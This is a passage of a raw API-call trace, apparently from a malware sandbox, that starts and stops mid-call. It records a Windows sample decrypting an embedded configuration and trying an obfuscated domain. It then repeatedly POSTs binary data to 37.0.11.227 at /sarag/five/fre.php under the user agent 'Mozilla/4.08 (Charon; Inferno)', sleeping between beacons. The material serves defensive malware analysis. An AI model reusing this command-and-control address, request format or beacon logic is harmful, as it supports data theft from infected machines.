application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0268.710] GetProcessHeap () returned 0x690000 [0268.710] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0268.711] GetProcessHeap () returned 0x690000 [0268.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0268.711] GetProcessHeap () returned 0x690000 [0268.711] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0268.711] GetProcessHeap () returned 0x690000 [0268.711] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0268.712] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0268.713] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0268.713] GetProcessHeap () returned 0x690000 [0268.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0268.713] GetProcessHeap () returned 0x690000 [0268.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0268.713] send (s=0x7f8, buf=0x6ad508*, len=242, flags=0) returned 242 [0268.714] send (s=0x7f8, buf=0x6aba40*, len=159, flags=0) returned 159 [0268.714] GetProcessHeap () returned 0x690000 [0268.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0268.716] recv (in: s=0x7f8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0268.853] GetProcessHeap () returned 0x690000 [0268.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0268.854] GetProcessHeap () returned 0x690000 [0268.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0268.854] GetProcessHeap () returned 0x690000 [0268.855] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0268.855] GetProcessHeap () returned 0x690000 [0268.855] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0268.855] closesocket (s=0x7f8) returned 0 [0268.856] GetProcessHeap () returned 0x690000 [0268.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0268.856] GetProcessHeap () returned 0x690000 [0268.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0268.856] GetProcessHeap () returned 0x690000 [0268.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0268.856] GetProcessHeap () returned 0x690000 [0268.857] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0268.857] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15b0) returned 0x7f8 [0268.858] Sleep (dwMilliseconds=0xea60) [0268.860] GetProcessHeap () returned 0x690000 [0268.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0268.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.861] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.876] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0268.903] GetProcessHeap () returned 0x690000 [0268.903] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0268.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.904] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0268.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.905] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.909] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.909] GetProcessHeap () returned 0x690000 [0268.910] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0268.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.911] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0268.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.912] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0268.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.913] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0268.913] GetProcessHeap () returned 0x690000 [0268.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0268.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.914] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.915] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.917] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.918] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.918] GetProcessHeap () returned 0x690000 [0268.918] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0268.918] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0268.919] GetProcessHeap () returned 0x690000 [0268.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0268.919] GetProcessHeap () returned 0x690000 [0268.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0268.919] GetProcessHeap () returned 0x690000 [0268.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0268.920] GetProcessHeap () returned 0x690000 [0268.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0268.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.921] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.926] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0268.932] GetProcessHeap () returned 0x690000 [0268.932] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0268.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.936] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0268.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.937] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.939] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.939] GetProcessHeap () returned 0x690000 [0268.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0268.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.940] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0268.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.942] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0268.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.943] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0268.943] GetProcessHeap () returned 0x690000 [0268.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0268.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.944] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0268.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.947] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0268.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.949] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0268.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.950] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0268.950] GetProcessHeap () returned 0x690000 [0268.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0268.950] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0268.950] GetProcessHeap () returned 0x690000 [0268.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0268.950] socket (af=2, type=1, protocol=6) returned 0x7fc [0268.950] connect (s=0x7fc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0268.976] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0268.976] GetProcessHeap () returned 0x690000 [0268.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0268.976] GetProcessHeap () returned 0x690000 [0268.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0268.978] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0268.979] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0268.979] GetProcessHeap () returned 0x690000 [0268.979] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0268.979] GetProcessHeap () returned 0x690000 [0268.979] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0268.979] GetProcessHeap () returned 0x690000 [0268.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0268.980] GetProcessHeap () returned 0x690000 [0268.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0268.980] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0268.981] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0268.981] GetProcessHeap () returned 0x690000 [0268.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0268.981] GetProcessHeap () returned 0x690000 [0268.982] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0268.982] send (s=0x7fc, buf=0x6ad508*, len=242, flags=0) returned 242 [0268.983] send (s=0x7fc, buf=0x6aba40*, len=159, flags=0) returned 159 [0268.983] GetProcessHeap () returned 0x690000 [0268.983] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0268.983] recv (in: s=0x7fc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0269.054] GetProcessHeap () returned 0x690000 [0269.054] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0269.055] GetProcessHeap () returned 0x690000 [0269.055] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0269.055] GetProcessHeap () returned 0x690000 [0269.055] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0269.056] GetProcessHeap () returned 0x690000 [0269.056] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0269.056] closesocket (s=0x7fc) returned 0 [0269.057] GetProcessHeap () returned 0x690000 [0269.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0269.057] GetProcessHeap () returned 0x690000 [0269.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0269.057] GetProcessHeap () returned 0x690000 [0269.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0269.057] GetProcessHeap () returned 0x690000 [0269.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0269.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15b4) returned 0x7fc [0269.061] Sleep (dwMilliseconds=0xea60) [0269.062] GetProcessHeap () returned 0x690000 [0269.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0269.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.063] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.072] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0269.080] GetProcessHeap () returned 0x690000 [0269.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0269.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.082] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0269.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.083] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.083] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.083] GetProcessHeap () returned 0x690000 [0269.084] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0269.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.085] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0269.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.086] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0269.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.086] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0269.086] GetProcessHeap () returned 0x690000 [0269.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0269.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.087] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0269.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.090] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0269.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.091] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0269.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.092] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0269.093] GetProcessHeap () returned 0x690000 [0269.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0269.093] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0269.093] GetProcessHeap () returned 0x690000 [0269.093] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0269.131] GetProcessHeap () returned 0x690000 [0269.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0269.131] GetProcessHeap () returned 0x690000 [0269.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0269.134] GetProcessHeap () returned 0x690000 [0269.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0269.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.135] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.140] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0269.146] GetProcessHeap () returned 0x690000 [0269.146] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0269.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.147] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0269.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.148] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.149] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.149] GetProcessHeap () returned 0x690000 [0269.149] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0269.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.150] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0269.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.151] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0269.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.152] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0269.152] GetProcessHeap () returned 0x690000 [0269.153] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0269.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.153] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0269.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.156] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0269.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.157] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0269.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.158] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0269.158] GetProcessHeap () returned 0x690000 [0269.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0269.158] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0269.158] GetProcessHeap () returned 0x690000 [0269.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0269.158] socket (af=2, type=1, protocol=6) returned 0x804 [0269.159] connect (s=0x804, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0269.187] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0269.187] GetProcessHeap () returned 0x690000 [0269.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0269.187] GetProcessHeap () returned 0x690000 [0269.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0269.188] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0269.189] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0269.189] GetProcessHeap () returned 0x690000 [0269.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0269.189] GetProcessHeap () returned 0x690000 [0269.189] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0269.189] GetProcessHeap () returned 0x690000 [0269.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0269.189] GetProcessHeap () returned 0x690000 [0269.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0269.190] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0269.191] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0269.191] GetProcessHeap () returned 0x690000 [0269.191] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0269.191] GetProcessHeap () returned 